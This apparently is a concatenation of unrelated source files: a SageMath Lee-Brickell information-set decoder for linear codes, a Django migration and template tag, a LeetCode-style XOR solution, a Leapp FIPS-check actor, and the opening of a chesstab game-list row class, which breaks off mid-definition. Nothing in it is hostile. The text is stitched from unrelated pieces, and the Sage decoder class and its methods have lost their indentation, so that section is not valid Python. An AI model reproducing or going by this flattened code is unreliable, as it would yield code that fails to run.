    `I`. The Lee-Brickell ISD loops the following until it is successful:

        1. Choose an information set `I` of `C`.
        2. Compute `r' = r - r_{I}\times G_I^{-1} \times G`
        3. Consider every size-`p` subset of `I`, `\{a_1, \dots, a_p\}`.
           For each `m = (m_1, \dots, m_p) \in GF(q)^{p}`, compute
           the error vector `e = r' - \sum_{i=1}^{p} m_i\times g_{a_i}`,
        4. If `e` has a Hamming weight at most `w`, return `r-e`.

    INPUT:

    - ``code`` -- A linear code for which to decode.

    - ``decoding_interval`` -- a pair of integers specifying an interval of
      number of errors to correct. Includes both end values.

    - ``search_size`` -- (optional) the size of subsets to use on step 3 of the
      algorithm as described above. Usually a small number. It has to be at most
      the largest allowed number of errors. A good choice will be approximated
      if this option is not set; see
      :meth:`sage.coding.LeeBrickellISDAlgorithm.calibrate`
      for details.

    EXAMPLES::

        sage: C = codes.GolayCode(GF(2))
        sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
        sage: A = LeeBrickellISDAlgorithm(C, (0,4)); A
        ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors

        sage: C = codes.GolayCode(GF(2))
        sage: A = LeeBrickellISDAlgorithm(C, (2,3)); A
        ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding between 2 and 3 errors
    """

    def __init__(self, code, decoding_interval, search_size = None):
        r"""
        TESTS:

        If ``search_size`` is not a positive integer, or is bigger than the
        decoding radius, an error will be raised::

            sage: C = codes.GolayCode(GF(2))
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: LeeBrickellISDAlgorithm(C, (1, 3), search_size=-1)
            Traceback (most recent call last):
            ...
            ValueError: The search size parameter has to be a positive integer

            sage: LeeBrickellISDAlgorithm(C, (1, 3), search_size=4)
            Traceback (most recent call last):
            ...
            ValueError: The search size parameter has to be at most the maximal number of allowed errors
        """
        if search_size is not None:
            # NOTE(review): ``search_size < 0`` admits 0 even though the
            # message says "positive"; p = 0 corresponds to plain ISD and
            # calibrate() may select it, so 0 appears intentionally allowed.
            if not isinstance(search_size, (Integer, int)) or search_size < 0:
                raise ValueError("The search size parameter has to be a positive integer")
            if search_size > decoding_interval[1]:
                raise ValueError("The search size parameter has to be at most"
                                 " the maximal number of allowed errors")
            super(LeeBrickellISDAlgorithm, self).__init__(code, decoding_interval, "Lee-Brickell",
                                parameters={ 'search_size': search_size })
            self._parameters_specified = True
        else:
            self._parameters_specified = False
            super(LeeBrickellISDAlgorithm, self).__init__(code, decoding_interval, "Lee-Brickell")

    def decode(self, r):
        r"""
        The Lee-Brickell algorithm as described in the class doc.

        Note that either parameters must be given at construction time or
        :meth:`sage.coding.information_set_decoder.InformationSetAlgorithm.calibrate()`
        should be called before calling this method.

        INPUT:

        - `r` -- a received word, i.e. a vector in the ambient space of
          :meth:`decoder.Decoder.code`.

        OUTPUT: A codeword whose distance to `r` satisfies ``self.decoding_interval()``.

        EXAMPLES::

            sage: M = matrix(GF(2), [[1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0],\
                                     [0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1],\
                                     [0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0],\
                                     [0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1],\
                                     [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1]])
            sage: C = codes.LinearCode(M)
            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: A = LeeBrickellISDAlgorithm(C, (2,2))
            sage: c = C.random_element()
            sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
            sage: r = Chan(c)
            sage: c_out = A.decode(r)
            sage: (r - c).hamming_weight() == 2
            True
        """
        import itertools
        from sage.misc.prandom import sample
        C = self.code()
        n, k = C.length(), C.dimension()
        tau = self.decoding_interval()
        p = self.parameters()['search_size']
        F = C.base_ring()
        G = C.generator_matrix()
        # Non-zero field elements, enumerated once outside the main loop.
        Fstar = F.list()[1:]
        # WARNING: this loop only terminates once a suitable codeword is
        # found; with an unsatisfiable decoding interval it runs forever.
        while True:
            # step 1.
            I = sample(range(n), k)
            Gi = G.matrix_from_columns(I)
            try:
                Gi_inv = Gi.inverse()
            except ZeroDivisionError:
                # I was not an information set
                continue
            Gt = Gi_inv * G
            #step 2.
            y = r - vector([r[i] for i in I]) * Gt
            g = Gt.rows()
            #step 3.
            # Try all error patterns of weight 0..p supported on the
            # information set; pi = 0 handles the "no extra errors" case.
            for pi in range(p+1):
                for A in itertools.combinations(range(k), pi):
                    for m in itertools.product(Fstar, repeat=pi):
                        e = y - sum(m[i]*g[A[i]] for i in range(pi))
                        errs = e.hamming_weight()
                        if errs >= tau[0] and errs <= tau[1]:
                            return r - e

    def calibrate(self):
        r"""
        Run some test computations to estimate the optimal search size.

        Let `p` be the search size. We should simply choose `p` such that the
        average expected time is minimal. The algorithm succeeds when it chooses
        an information set with at least `k - p` correct positions, where `k` is
        the dimension of the code and `p` the search size. The expected number
        of trials we need before this occurs is:

        .. MATH::

            \binom{n}{k}/(\rho \sum_{i=0}^p \binom{n-\tau}{k-i} \binom{\tau}{i})

        Here `\rho` is the fraction of `k` subsets of indices which are
        information sets. If `T` is the average time for steps 1 and 2
        (including selecting `I` until an information set is found), while `P(i)`
        is the time for the body of the ``for``-loop in step 3 for `m` of weight
        `i`, then each information set trial takes roughly time `T +
        \sum_{i=0}^{p} P(i) \binom{k}{i} (q-1)^i`, where `\GF{q}` is the base
        field.

        The values `T` and `P` are here estimated by running a few test
        computations similar to those done by the decoding algorithm.

        We don't explicitly estimate `\rho`.

        OUTPUT: Does not output anything but sets private fields used by
        :meth:`sage.coding.information_set_decoder.InformationSetAlgorithm.parameters()`
        and
        :meth:`sage.coding.information_set_decoder.InformationSetAlgorithm.time_estimate()``.

        EXAMPLES::

            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: C = codes.GolayCode(GF(2))
            sage: A = LeeBrickellISDAlgorithm(C, (0,3)); A
            ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 3 errors
            sage: A.calibrate()
            sage: A.parameters() #random
            {'search_size': 1}
            sage: A.time_estimate() #random
            0.0008162108571427874

        If we specify the parameter at construction time, calibrate does not override this choice::

            sage: A = LeeBrickellISDAlgorithm(C, (0,3), search_size=2); A
            ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 3 errors
            sage: A.parameters()
            {'search_size': 2}
            sage: A.calibrate()
            sage: A.parameters()
            {'search_size': 2}
            sage: A.time_estimate() #random
            0.0008162108571427874
        """
        from sage.matrix.special import random_matrix
        from sage.misc.prandom import sample, randint
        from sage.modules.free_module_element import random_vector
        from time import process_time
        C = self.code()
        G = C.generator_matrix()
        n, k = C.length(), C.dimension()
        # Calibrate against the worst case: the maximal number of errors.
        tau = self.decoding_interval()[1]
        F = C.base_ring()
        q = F.cardinality()
        Fstar = F.list()[1:]
        def time_information_set_steps():
            # One sample of T: draw index sets until an invertible G_I is
            # found, mirroring steps 1-2 of decode().
            before = process_time()
            while True:
                I = sample(range(n), k)
                Gi = G.matrix_from_columns(I)
                try:
                    Gi_inv = Gi.inverse()
                except ZeroDivisionError:
                    continue
                return process_time() - before
        def time_search_loop(p):
            # One sample of P(p): average over 100 runs of the inner-loop
            # body (error-vector computation) for weight-p coefficients.
            y = random_vector(F, n)
            g = random_matrix(F, p, n).rows()
            scalars = [ [ Fstar[randint(0,q-2)] for i in range(p) ]
                        for s in range(100) ]
            before = process_time()
            for m in scalars:
                e = y - sum(m[i]*g[i] for i in range(p))
            return (process_time() - before) / 100.
        T = sum([ time_information_set_steps() for s in range(5) ]) / 5.
        P = [ time_search_loop(p) for p in range(tau+1) ]
        def compute_estimate(p):
            # Expected total time = expected #trials * time per trial,
            # per the formula in the docstring (rho omitted).
            iters = 1.* binomial(n, k)/ \
                sum( binomial(n-tau, k-i)*binomial(tau,i) for i in range(p+1) )
            estimate = iters*(T + \
                sum(P[pi] * (q-1)**pi * binomial(k, pi) for pi in range(p+1) ))
            return estimate
        if self._parameters_specified:
            self._time_estimate = compute_estimate(self._parameters['search_size'])
        else:
            self._calibrate_select([ compute_estimate(p) for p in range(tau+1) ])

    def _calibrate_select(self, estimates):
        r"""
        Internal method used by ``self.calibrate()``.

        Given the timing estimates, select the best parameter and set the
        appropriate private fields.

        INPUT:

        - `estimates` - list of time estimates, for the search size set to the
          index of the list entry.

        OUTPUT: None, but sets the private fields `self._parameters` and
        `self._time_estimate`.

        TESTS::

            sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
            sage: C = codes.GolayCode(GF(2))
            sage: A = LeeBrickellISDAlgorithm(C, (0,3)); A
            ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 3 errors
            sage: A._calibrate_select([ 1.0, 2.0, 3.0, 0.5, 0.6, 1.0 ])
            sage: A._time_estimate
            0.500000000000000
            sage: A._parameters
            {'search_size': 3}
        """
        # Argmin over the estimates; ties keep the smaller search size.
        search_size = 0
        for p in range(1, len(estimates)):
            if estimates[p] < estimates[search_size]:
                search_size = p
        self._parameters = { 'search_size': search_size }
        self._time_estimate = estimates[search_size]
class LinearCodeInformationSetDecoder(Decoder):
r"""
Information-set decoder for any linear code.
Information-set decoding is a probabilistic decoding strategy that
essentially tries to guess `k` correct positions in the received word,
where `k` is the dimension of the code. A codeword agreeing with the
received word on the guessed position can easily be computed, and their
difference is one possible error vector. A "correct" guess is assumed when
this error vector has low Hamming weight.
The ISD strategy requires choosing how many errors is deemed acceptable. One
choice could be `d/2`, where `d` is the minimum distance of the code, but
sometimes `d` is not known, or sometimes more errors are expected. If one
chooses anything above `d/2`, the algorithm does not guarantee to return a
nearest codeword.
This simple algorithm is not very efficient in itself, but there are numerous
refinements to the strategy. Specifying which strategy to use among those
that Sage knows is done using the ``algorithm`` keyword. If this is not set,
an efficient choice will be made for you.
The various ISD algorithms all need to select a number of parameters. If you
choose a specific algorithm to use, you can pass these parameters as named
parameters directly to this class' constructor. If you don't, efficient
choices will be calibrated for you.
.. WARNING::
If there is no codeword within the specified decoding distance, then the
decoder may never terminate, or it may raise a
:exc:`sage.coding.decoder.DecodingError` exception, depending on the ISD
algorithm used.
INPUT:
- ``code`` -- A linear code for which to decode.
- ``number_errors`` -- an integer, the maximal number of errors to accept as
correct decoding. An interval can also be specified by giving a pair of
integers, where both end values are taken to be in the interval.
- ``algorithm`` -- (optional) the string name of the ISD algorithm to
employ. If this is not set, an appropriate one will be chosen.
A constructed
:class:`sage.coding.information_set_decoder.InformationSetAlgorithm`
object may also be given. In this case ``number_errors`` must match that
of the passed algorithm.
- ``**kwargs`` -- (optional) any number of named arguments passed on to the
ISD algorithm. Such are usually not required, and they can only be set if
``algorithm`` is set to a specific algorithm. See the documentation for
each individual ISD algorithm class for information on any named arguments
they may accept. The easiest way to access this documentation is to first
construct the decoder without passing any named arguments, then accessing
the ISD algorithm using
:meth:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder.algorithm`,
and then reading the `?` help on the constructed object.
EXAMPLES:
The principal way to access this class is through the
:meth:`sage.code.linear_code.AbstractLinearCode.decoder` method::
sage: C = codes.GolayCode(GF(3))
sage: D = C.decoder("InformationSet", 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
You can specify which algorithm you wish to use, and you should do so in
order to pass special parameters to it::
sage: C = codes.GolayCode(GF(3))
sage: D2 = C.decoder("InformationSet", 2, algorithm="Lee-Brickell", search_size=2); D2
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
sage: D2.algorithm()
ISD Algorithm (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
sage: D2.algorithm().parameters()
{'search_size': 2}
If you specify an algorithm which is not known, you get a friendly error message::
sage: C.decoder("InformationSet", 2, algorithm="NoSuchThing")
Traceback (most recent call last):
...
ValueError: Unknown ISD algorithm 'NoSuchThing'. The known algorithms are ['Lee-Brickell'].
You can also construct an ISD algorithm separately and pass that. This is
mostly useful if you write your own ISD algorithms::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0, 2))
sage: D = C.decoder("InformationSet", 2, algorithm=A); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
When passing an already constructed ISD algorithm, you can't also pass
parameters to the ISD algorithm when constructing the decoder::
sage: C.decoder("InformationSet", 2, algorithm=A, search_size=2)
Traceback (most recent call last):
...
ValueError: ISD algorithm arguments are not allowed when supplying a constructed ISD algorithm
We can also information-set decode non-binary codes::
sage: C = codes.GolayCode(GF(3))
sage: D = C.decoder("InformationSet", 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
There are two other ways to access this class::
sage: D = codes.decoders.LinearCodeInformationSetDecoder(C, 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
sage: from sage.coding.information_set_decoder import LinearCodeInformationSetDecoder
sage: D = LinearCodeInformationSetDecoder(C, 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
"""
def __init__(self, code, number_errors, algorithm=None, **kwargs):
r"""
TESTS:
``number_errors`` has to be either a list of Integers/ints, a tuple of Integers/ints,
or an Integer/int::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", "aa")
Traceback (most recent call last):
...
ValueError: number_errors should be an integer or a pair of integers
If ``number_errors`` is passed as a list/tuple, it has to contain only
two values, the first one being at most the second one::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", (4, 2))
Traceback (most recent call last):
...
ValueError: number_errors should be a positive integer or a valid interval within the positive integers
You cannot ask the decoder to correct more errors than the code length::
sage: D = C.decoder("InformationSet", 25)
Traceback (most recent call last):
...
ValueError: The provided number of errors should be at most the code's length
If ``algorithm`` is not set, additional parameters cannot be passed to
the ISD algorithm::
sage: D = C.decoder("InformationSet", 2, search_size=2)
Traceback (most recent call last):
...
ValueError: Additional arguments to an information-set decoder algorithm are only allowed if a specific algorithm is selected by setting the algorithm keyword
If ``algorithm`` is set to a constructed ISD algorithm, additional
parameters cannot be passed to the ISD algorithm::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0, 2))
sage: D = C.decoder("InformationSet", 2, A, search_size=3)
Traceback (most recent call last):
...
ValueError: ISD algorithm arguments are not allowed when supplying a constructed ISD algorithm
If ``algorithm`` is set to a constructed
:class:`sage.coding.information_set_decoder.InformationSetAlgorithm`,
then ``number_errors`` must match that of the algorithm::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0, 2))
sage: D = C.decoder("InformationSet", 2, A); D
Information-set decoder (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 2 errors
sage: D = C.decoder("InformationSet", (0,2), A); D
Information-set decoder (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 2 errors
sage: D = C.decoder("InformationSet", 3, A); D
Traceback (most recent call last):
...
ValueError: number_errors must match that of the passed ISD algorithm
"""
if isinstance(number_errors, (Integer, int)):
number_errors = (0, number_errors)
if isinstance(number_errors, (tuple, list)) and len(number_errors) == 2 \
and number_errors[0] in ZZ and number_errors[1] in ZZ:
if 0 > number_errors[0] or number_errors[0] > number_errors[1]:
raise ValueError(
"number_errors should be a positive integer or"
" a valid interval within the positive integers")
if number_errors[1] > code.length():
raise ValueError("The provided number of errors should be at"
" most the code's length")
else:
raise ValueError("number_errors should be an integer or a pair of integers")
self._number_errors = number_errors
super(LinearCodeInformationSetDecoder, self).__init__(
code, code.ambient_space(), code._default_encoder_name)
if algorithm is None:
if kwargs:
raise ValueError("Additional arguments to an information-set decoder"
" algorithm are only allowed if a specific"
" algorithm is selected by setting the algorithm"
" keyword")
algorithm = "Lee-Brickell"
algorithm_names = LinearCodeInformationSetDecoder.known_algorithms(dictionary=True)
if isinstance(algorithm, InformationSetAlgorithm):
if kwargs:
raise ValueError("ISD algorithm arguments are not allowed when"
" supplying a constructed ISD algorithm")
if number_errors != algorithm.decoding_interval():
raise ValueError("number_errors must match that of the passed"
" ISD algorithm")
self._algorithm = algorithm
elif algorithm in algorithm_names:
self._algorithm = algorithm_names[algorithm](code, number_errors, **kwargs)
else:
raise ValueError("Unknown ISD algorithm '{}'."
" The known algorithms are {}."\
.format(algorithm, sorted(algorithm_names)))
_known_algorithms = {
"Lee-Brickell": LeeBrickellISDAlgorithm
}
@staticmethod
def known_algorithms(dictionary=False):
r"""
Return the list of ISD algorithms that Sage knows.
Passing any of these to the constructor of
:class:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder`
will make the ISD decoder use that algorithm.
INPUT:
- ``dictionary`` - optional. If set to ``True``, return a ``dict``
mapping decoding algorithm name to its class.
OUTPUT: a list of strings or a ``dict`` from string to ISD algorithm class.
EXAMPLES::
sage: from sage.coding.information_set_decoder import LinearCodeInformationSetDecoder
sage: sorted(LinearCodeInformationSetDecoder.known_algorithms())
['Lee-Brickell']
"""
if dictionary:
return LinearCodeInformationSetDecoder._known_algorithms
else:
return LinearCodeInformationSetDecoder._known_algorithms.keys()
def algorithm(self):
r"""
Return the ISD algorithm used by this ISD decoder.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", (2,4), "Lee-Brickell")
sage: D.algorithm()
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding between 2 and 4 errors
"""
return self._algorithm
def decode_to_code(self, r):
r"""
Decodes a received word with respect to the associated code of this decoder.
.. WARNING::
If there is no codeword within the decoding radius of this decoder, this
method may never terminate, or it may raise a
:exc:`sage.coding.decoder.DecodingError` exception, depending on the ISD
algorithm used.
INPUT:
- ``r`` -- a vector in the ambient space of :meth:`decoder.Decoder.code`.
OUTPUT: a codeword of :meth:`decoder.Decoder.code`.
EXAMPLES::
sage: M = matrix(GF(2), [[1,0,0,0,0,0,1,0,1,0,1,1,0,0,1],\
[0,1,0,0,0,1,1,1,1,0,0,0,0,1,1],\
[0,0,1,0,0,0,0,1,0,1,1,1,1,1,0],\
[0,0,0,1,0,0,1,0,1,0,0,0,1,1,0],\
[0,0,0,0,1,0,0,0,1,0,1,1,0,1,0]])
sage: C = LinearCode(M)
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: D = C.decoder('InformationSet', 2)
sage: c == D.decode_to_code(r)
True
Information-set decoding a non-binary code::
sage: C = codes.GolayCode(GF(3)); C
[12, 6, 6] Extended Golay code over GF(3)
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: D = C.decoder('InformationSet', 2)
sage: c == D.decode_to_code(r)
True
Let's take a bigger example, for which syndrome decoding or
nearest-neighbor decoding would be infeasible: the `[59, 30]` Quadratic
Residue code over `\GF{3}` has true minimum distance 17, so we can
correct 8 errors::
sage: C = codes.QuadraticResidueCode(59, GF(3))
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: D = C.decoder('InformationSet', 8)
sage: c == D.decode_to_code(r) # long time
True
"""
C = self.code()
if r in C:
return r
return self.algorithm().decode(r)
def decoding_radius(self):
r"""
Return the maximal number of errors this decoder can decode.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", 2)
sage: D.decoding_radius()
2
"""
return self._number_errors[1]
def decoding_interval(self):
r"""
A pair of integers specifying the interval of number of errors this
decoder will attempt to correct.
The interval includes both end values.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", 2)
sage: D.decoding_interval()
(0, 2)
"""
return self._number_errors
def _repr_(self):
r"""
Returns a string representation of this decoding algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", 2)
sage: D
Information-set decoder (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 2 errors
"""
return "Information-set decoder ({}) for {} decoding {} errors ".format(self.algorithm().name(), self.code(), _format_decoding_interval(self.decoding_interval()))
def _latex_(self):
    r"""
    Return a latex representation of this decoding algorithm.

    EXAMPLES::

        sage: C = codes.GolayCode(GF(2))
        sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
        sage: D = C.decoder("InformationSet", 2)
        sage: latex(D)
        \textnormal{Information-set decoder (Lee-Brickell) for }[24, 12, 8] \textnormal{ Extended Golay Code over } \Bold{F}_{2} \textnormal{decoding up to 2 errors}
    """
    # Doubled braces produce literal ``{`` / ``}`` for the LaTeX
    # \textnormal groups; the code itself supplies its own latex form.
    return "\\textnormal{{Information-set decoder ({}) for }}{} \\textnormal{{decoding {} errors}}".format(self.algorithm().name(), self.code()._latex_(), _format_decoding_interval(self.decoding_interval()))
# Decoder-type tags registered on the class after its definition so the
# attribute is shared by every instance of the decoder.
LinearCodeInformationSetDecoder._decoder_type = {"hard-decision",
    "probabilistic", "not-always-closest", "bounded-distance", "might-fail"}
| StarcoderdataPython |
3296400 | # Generated by Django 2.2.1 on 2019-08-05 07:26
from django.db import migrations, models
import stdimage.models
class Migration(migrations.Migration):
    """Add ``Team.alibaba_account`` and relax the ``User.icon`` field."""

    dependencies = [
        ('authentication', '0012_auto_20190709_1304'),
    ]

    operations = [
        # New optional text field holding the team's Alibaba Cloud account id.
        migrations.AddField(
            model_name='team',
            name='alibaba_account',
            field=models.CharField(blank=True, max_length=20, verbose_name='Alibaba Cloud Account ID'),
        ),
        # Icon becomes optional (blank/null allowed), stored under icons/.
        migrations.AlterField(
            model_name='user',
            name='icon',
            field=stdimage.models.StdImageField(blank=True, null=True, upload_to='icons/'),
        ),
    ]
| StarcoderdataPython |
3270798 | """
Copyright 2010 <NAME>, <NAME>, and <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django import template
register = template.Library()
# Based on http://stackoverflow.com/questions/340888/navigation-in-django/1800535#1800535
@register.tag
def nav_url(parser, token):
    '''{% active url %} maps to href="url" and also adds class="url" only if
    the current page is the given url. {% active url current %} maps to
    href="url" and also adds class="url" if the current page starts with the
    current url.'''
    args = token.split_contents()
    template_tag = args[0]
    if len(args) < 2 or len(args) > 3:
        # Parenthesised raise form: the old ``raise Cls, msg`` statement is a
        # syntax error on Python 3; this form works on both 2 and 3.
        raise template.TemplateSyntaxError(
            "%r tag requires the url to link to, and an optional path to compare with" % template_tag)
    return NavSelectedNode(*args[1:])
class NavSelectedNode(template.Node):
    """Render ``href="url"`` plus ``class="current"`` when the request path
    matches (or starts with) the configured comparison url."""

    def __init__(self, url, current=None):
        self.url = url
        # With no separate comparison path, compare against the target url.
        self.current = current or url

    def render(self, context):
        path = context['request'].path
        target = template.Variable(self.current).resolve(context)
        href = template.Variable(self.url).resolve(context)
        selected = ""
        if target in ('/', ''):
            # A root/empty target only matches a root/empty request path.
            if path in ('/', '') and path.startswith(target):
                selected = ' class="current"'
        elif path.startswith(target):
            selected = ' class="current"'
        return 'href="%s"%s' % (href, selected)
| StarcoderdataPython |
50966 | <gh_stars>0
class Solution:
    def singleNumber(self, nums: List[int]) -> int:
        """Return the element of *nums* that appears exactly once.

        Every other element appears exactly twice, so XOR-folding the list
        cancels the pairs and leaves the unique element.  This runs in O(n)
        time and O(1) extra space; the previous ``itertools.accumulate``
        version materialised the whole prefix list just to read its last
        element.
        """
        from functools import reduce
        from operator import xor
        return reduce(xor, nums, 0)
| StarcoderdataPython |
3321245 | from leapp.actors import Actor
from leapp.exceptions import StopActorExecutionError
from leapp.models import Report, KernelCmdline
from leapp.tags import IPUWorkflowTag, ChecksPhaseTag
from leapp import reporting
class CheckFips(Actor):
    """
    Inhibit upgrade if FIPS is detected as enabled.
    """

    name = 'check_fips'
    consumes = (KernelCmdline,)
    produces = (Report,)
    tags = (IPUWorkflowTag, ChecksPhaseTag)

    def process(self):
        """Inspect the kernel command line and report when fips=1 is set."""
        cmdline = next(self.consume(KernelCmdline), None)
        if not cmdline:
            raise StopActorExecutionError(
                'Cannot check FIPS state due to missing command line parameters',
                details={'Problem': 'Did not receive a message with kernel command '
                                    'line parameters (KernelCmdline)'})
        for param in cmdline.parameters:
            # Guard clause: skip everything that is not an enabled fips flag.
            if param.key != 'fips' or param.value != '1':
                continue
            reporting.create_report([
                reporting.Title('Cannot upgrade a system with FIPS mode enabled'),
                reporting.Summary(
                    'Leapp has detected that FIPS is enabled on this system. '
                    'In-place upgrade of systems in FIPS mode is currently unsupported.'),
                reporting.Severity(reporting.Severity.HIGH),
                reporting.Tags([reporting.Tags.SECURITY]),
                reporting.Flags([reporting.Flags.INHIBITOR])
            ])
157034 | <filename>chesstab/gui/gamerow.py
# gamerow.py
# Copyright 2008 <NAME>
# Licence: See LICENCE (BSD licence)
"""Create widgets that display tag roster details of games on database.
"""
import tkinter
from solentware_grid.gui.datarow import (
GRID_COLUMNCONFIGURE,
GRID_CONFIGURE,
WIDGET_CONFIGURE,
WIDGET,
ROW,
)
from pgn_read.core.constants import (
TAG_WHITE,
TAG_BLACK,
TAG_RESULT,
TAG_EVENT,
TAG_DATE,
SEVEN_TAG_ROSTER,
DEFAULT_TAG_VALUE,
DEFAULT_TAG_DATE_VALUE,
DEFAULT_TAG_RESULT_VALUE,
)
from .datarow import DataRow
from ..core.chessrecord import ChessDBrecordGameTags
from .gamedbedit import GameDbEdit
from .gamedbdelete import GameDbDelete
from .gamedbshow import GameDbShow
from . import constants
ON_DISPLAY_COLOUR = "#eba610" # a pale orange
class ChessDBrowGame(ChessDBrecordGameTags, DataRow):
    """Define row in list of games.

    Add row methods to the chess game record definition.
    """

    # Grid header layout: one tkinter.Label per column -- White, Result,
    # Black, Event, Date, then a wide "Tags" column for the remaining tags.
    header_specification = [
        {
            WIDGET: tkinter.Label,
            WIDGET_CONFIGURE: dict(
                text=TAG_WHITE,
                anchor=tkinter.W,
                padx=0,
                pady=1,
                font="TkDefaultFont",
            ),
            GRID_CONFIGURE: dict(column=0, sticky=tkinter.EW),
            GRID_COLUMNCONFIGURE: dict(weight=1, uniform="player"),
            ROW: 0,
        },
        {
            WIDGET: tkinter.Label,
            WIDGET_CONFIGURE: dict(
                text=TAG_RESULT,
                anchor=tkinter.CENTER,
                padx=0,
                pady=1,
                font="TkDefaultFont",
            ),
            GRID_CONFIGURE: dict(column=1, sticky=tkinter.EW),
            GRID_COLUMNCONFIGURE: dict(weight=1, uniform="score"),
            ROW: 0,
        },
        {
            WIDGET: tkinter.Label,
            WIDGET_CONFIGURE: dict(
                text=TAG_BLACK,
                anchor=tkinter.W,
                padx=0,
                pady=1,
                font="TkDefaultFont",
            ),
            GRID_CONFIGURE: dict(column=2, sticky=tkinter.EW),
            GRID_COLUMNCONFIGURE: dict(weight=1, uniform="player"),
            ROW: 0,
        },
        {
            WIDGET: tkinter.Label,
            WIDGET_CONFIGURE: dict(
                text=TAG_EVENT,
                anchor=tkinter.W,
                padx=0,
                pady=1,
                font="TkDefaultFont",
            ),
            GRID_CONFIGURE: dict(column=3, sticky=tkinter.EW),
            GRID_COLUMNCONFIGURE: dict(weight=1, uniform="event"),
            ROW: 0,
        },
        {
            WIDGET: tkinter.Label,
            WIDGET_CONFIGURE: dict(
                text=TAG_DATE,
                anchor=tkinter.W,
                padx=0,
                pady=1,
                font="TkDefaultFont",
            ),
            GRID_CONFIGURE: dict(column=4, sticky=tkinter.EW),
            GRID_COLUMNCONFIGURE: dict(weight=1, uniform="date"),
            ROW: 0,
        },
        {
            WIDGET: tkinter.Label,
            WIDGET_CONFIGURE: dict(
                text="Tags",
                anchor=tkinter.W,
                padx=10,
                pady=1,
                font="TkDefaultFont",
            ),
            GRID_CONFIGURE: dict(column=5, sticky=tkinter.EW),
            GRID_COLUMNCONFIGURE: dict(weight=4, uniform="tags"),
            ROW: 0,
        },
    ]

    def __init__(self, database=None, ui=None):
        """Extend and associate record definition with database.

        database - the open database that is source of row data
        ui - the ChessUI instance
        """
        super(ChessDBrowGame, self).__init__()
        self.ui = ui
        self.set_database(database)
        # Per-row widget layout mirroring header_specification column for
        # column (same columns, data font instead of the header font).
        self.row_specification = [
            {
                WIDGET: tkinter.Label,
                WIDGET_CONFIGURE: dict(
                    anchor=tkinter.W,
                    font=constants.LISTS_OF_GAMES_FONT,
                    pady=1,
                    padx=0,
                ),
                GRID_CONFIGURE: dict(column=0, sticky=tkinter.EW),
                ROW: 0,
            },
            {
                WIDGET: tkinter.Label,
                WIDGET_CONFIGURE: dict(
                    anchor=tkinter.CENTER,
                    font=constants.LISTS_OF_GAMES_FONT,
                    pady=1,
                    padx=0,
                ),
                GRID_CONFIGURE: dict(column=1, sticky=tkinter.EW),
                ROW: 0,
            },
            {
                WIDGET: tkinter.Label,
                WIDGET_CONFIGURE: dict(
                    anchor=tkinter.W,
                    font=constants.LISTS_OF_GAMES_FONT,
